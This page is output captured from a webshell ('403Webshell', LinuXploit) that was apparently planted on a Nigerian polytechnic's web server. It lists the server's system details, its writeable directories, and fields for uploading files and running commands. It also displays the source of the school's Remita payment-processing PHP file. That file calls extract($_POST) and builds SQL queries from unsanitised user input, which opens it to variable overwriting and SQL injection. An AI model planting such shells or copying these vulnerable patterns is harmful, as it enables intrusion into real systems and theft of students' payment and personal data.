403Webshell
Server IP : 172.64.80.1  /  Your IP : 108.162.241.67
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/processpaymentb.php
<?php 
session_start();
extract($_POST);
$_SESSION['idNo']=$idNo;
include 'remita_constants.php';

 $timesammp=DATE("ymd");
echo $orderID=$timesammp.mt_rand(1000000, 9999999);
//echo '___';
//$orderID = $timesammp;
//$orderID=mt_rand(1000, 9999).mt_rand(1000, 9999);

//die();
//$responseurl = PATH . "/receipt-pageb.php";
//$responseurl = PATH . "/new-receipt-page.php";
$responseurl = PATH . "/new-receipt-otherPayment.php";

$ptype1=explode(',',$_POST['ptype']);
$paymentType=$ptype1[0];

$_SESSION['paymentTYPE']=$paymentType;
$_SESSION['orderID']=$orderID;
		if (( $paymentType=="New Transcript Request") or ( $paymentType=="Reprint Transcript") or ( $paymentType=="Additional Reprint Transcript")  or ( $paymentType=="Additional Transcript Payment") ){
			$servicetypeId = SERVICETYPEID_TRA;	 
		}elseif( $paymentType=="Development") {
			$servicetypeId = SERVICETYPEID_DEV;
		}elseif( $paymentType=="Certificate Levy") {
			$servicetypeId = SERVICETYPEID_CER;
		}elseif( $paymentType=="Accommodation") {
			$servicetypeId = SERVICETYPEID_ACC;
		}elseif( $paymentType=="Student Association/Club Reg.") {
			$servicetypeId = SERVICETYPEID_STU;
		}elseif( $paymentType=="JAMB Regularization") {
			$servicetypeId = SERVICETYPEID_JAM;
		}elseif( $paymentType=="Additional JAMB Regularization") {
			$servicetypeId = SERVICETYPEID_JAM;
		}elseif( $paymentType=="Refund of Advances") {
			$servicetypeId = SERVICETYPEID_REF;
		}elseif( $paymentType=="Other Payments") {
			$servicetypeId = SERVICETYPEID_OTH;
		}elseif( $paymentType=="Change of Course Fee") {
			$servicetypeId = SERVICETYPEID_COC;
		}elseif( $paymentType=="Late Registration Penalty Charges") {
			$servicetypeId = SERVICETYPEID_LRF;
			//Created on = 01/03/2016-4:48pm
		}elseif( $paymentType=="Lost of Item Penalty") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Lost of School Receipt") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Verification of result") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Re-Notification of Result") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Refund of Turning Advance") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Refund of Cash Advance") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Registration of contractor") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Rentage of Hall") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Sales of Boarded Items") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Tender Fee") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif($paymentType=="Reparation Fee") {
            $servicetypeId = SERVICETYPEID_OTH;
        }else {
            die("No Payment Description".$paymentType);
        }


$concatString = MERCHANTID . $servicetypeId . $orderID . $amt . $responseurl . APIKEY;
$hash = hash('sha512', $concatString);
//$paymentType='Acceptance Fee';
?>
<html>
<p>You will be redirected to Remita in few seconds.......</p>

<form action="<?php echo GATEWAYURL; ?>" id="remita_form" name="remita_form" method="POST">
<input id="merchantId" name="merchantId" value="<?php echo MERCHANTID; ?>" type="hidden"/>
<input id="serviceTypeId" name="serviceTypeId" value="<?php echo $servicetypeId; ?>" type="hidden"/>
<input id="amt" name="amt" value="<?php echo $amt; ?>" type="hidden"/>
<input id="responseurl" name="responseurl" value="<?php echo $responseurl; ?>" type="hidden"/>
<input id="hash" name="hash" value="<?php echo $hash; ?>" type="hidden"/>
<input id="payerName" name="payerName" value="<?php echo $payerName; ?>" type="hidden"/>
<input id="paymenttype" name="paymenttype" value="<?php echo $paymenttype; ?>" type="hidden"/>
<input id="payerEmail" name="payerEmail" value="<?php echo $payerEmail; ?>" type="hidden"/>
<input id="payerPhone" name="payerPhone" value="<?php echo $payerPhone; ?>" type="hidden"/>
<input id="orderId" name="orderId" value="<?php echo $orderID; ?>" type="hidden"/>
</form>
<?php
require('../connect.php');
$db=db_connect();
//require('../filetoU/logFile.php');
//$logD='OrderID: '.$orderID.' PaymentType: '.$paymentType;
//logDetail($idNo,$logD);
		 $ip2=$_SERVER['HTTP_X_FORWARDED_FOR'];
		 $ip1=$_SERVER['REMOTE_ADDR'];
		 
		 $ptype1=explode(',',$_POST['ptype']);
$ptype=$ptype1[0];
//=================================================End Session Retriver=================
$sql_current = $db->query("select * from current where sn=2");
$num_current = $sql_current->rowCount();
$row_current = $sql_current->fetch(PDO::FETCH_BOTH);
if ($num_current > 0) {
    $semester = $_SESSION['asemester'] = $row_current['asemester'];
    $asession = $_SESSION['asession'] = $row_current['asession'];
}
//=================================================End Session Retriver=====================


 $aspoah="INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`descr`,`pay_session`) VALUES (NULL, ?, '0', '0', '-1', ?, 'Not Yet Approved', ?, ?, 'False','$ip1','$ip2','$desc','$asession')";
//die();
$asp_o=$db->prepare($aspoah);
//$asp_o=$db->prepare("INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`descr`,`pay_session`) VALUES (NULL, ?, '0', '0', '-1', ?, 'Not Yet Approved', ?, ?, 'False',?,?,?,'2017/2018')");
//$asp_o=$db->prepare("INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`descr`,`pay_session`) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?,?,?,?,?)");
$asp_o->execute([$orderID,$idNo,$amt,$ptype]);
$sql="select * from otherpayment where idNo='$idNo'";
$result=$db->query($sql);
$num=$result->rowCount();
if ($num>0){
//    die("here");
//    $dd="UPDATE `fedpoly`.`otherpayment` SET `names` = '$payerName',`email` = '$payerEmail',`phone` = '$payerPhone',`descr` = '$desc',`orderID` = '$orderID' WHERE `otherpayment`.`idNo` ='$idNo' and (`names`='' OR `names`='.')"
//	$db->query($dd);
    $princess=$db->prepare("UPDATE `fedpoly`.`otherpayment` SET `names` = ?,`email` = ?,`phone` = ?,`descr` = ?,`orderID` = ? WHERE `otherpayment`.`idNo` =? and (`names`='' OR `names`='.')");
    $princess->execute([$payerName,$payerEmail,$payerPhone,$desc,$orderID,$idNo]);
}else{
	$payerName=str_replace("'","''",$payerName);
$db->query("INSERT INTO `fedpoly`.`otherpayment` (`sn`, `idNo`, `names`, `email`, `phone`,`descr`,`orderID`) VALUES (NULL, '$idNo', '$payerName', '$payerEmail', '$payerPhone','$desc','$orderID')");
} 
//die($ptype);
?>
<script type="text/javascript">document.getElementById("remita_form").submit();</script>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit